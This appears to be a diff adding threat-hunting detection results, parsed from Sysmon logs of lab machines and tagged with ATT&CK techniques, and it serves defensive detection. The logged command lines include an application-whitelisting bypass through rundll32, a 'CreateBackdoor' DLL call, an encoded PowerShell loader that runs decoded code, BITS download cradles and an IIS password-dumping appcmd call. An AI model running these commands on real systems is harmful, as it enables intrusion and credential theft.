+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16443
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:58:54.772
+ 365ABB72-269E-5CD8-0000-001084F81A00
+ 2728
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-268F-5CD8-0000-0010F4A51700
+ 1256
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243516
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.518
+ 747F3D96-9F61-5E75-0000-00109B6C1E00
+ 6620
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16443
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:58:54.772
+ 365ABB72-269E-5CD8-0000-001084F81A00
+ 2728
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-268F-5CD8-0000-0010F4A51700
+ 1256
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16443
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:58:54.772
+ 365ABB72-269E-5CD8-0000-001084F81A00
+ 2728
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-268F-5CD8-0000-0010F4A51700
+ 1256
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16040
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-11 17:28:22.488
+ 365ABB72-0636-5CD7-0000-0010A6C72100
+ 544
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ c:\windows\System32\cmd.exe
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-F9CD-5CD6-0000-00201B370100
+ 0x1371b
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-0545-5CD7-0000-001078371F00
+ 3044
+ C:\Windows\System32\dllhost.exe
+ C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5988
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:20.375
+ 365ABB72-3D70-5CEB-0000-001032EAFF00
+ 1004
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4893
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:03.238
+ 747F3D96-660F-5D3F-0000-001055378600
+ 2948
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4893
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:03.238
+ 747F3D96-660F-5D3F-0000-001055378600
+ 2948
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5985
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:20.265
+ 365ABB72-3D70-5CEB-0000-001072E6FF00
+ 2640
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4892
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:03.184
+ 747F3D96-660F-5D3F-0000-00109B328600
+ 6020
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966184
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 17:41:08.947
+ 365ABB72-29B4-5C91-0000-0010289AC308
+ 3748
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.EXE /c malwr.vbs
+ C:\Windows\system32\
+ EXAMPLE\user01
+ 365ABB72-2209-5C91-0000-0020FA479E03
+ 0x39e47fa
+ 2
+ High
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-1A4A-5C91-0000-0010455A0000
+ 512
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243514
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.511
+ 747F3D96-9F61-5E75-0000-0010736B1E00
+ 8116
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c notepad.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 11126
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-09 02:08:00.336
+ 365ABB72-8B80-5CD3-0000-001065512A00
+ 2264
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /c notepad.exe
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-863B-5CD3-0000-00204A390100
+ 0x1394a
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-8B77-5CD3-0000-0010E8FD2900
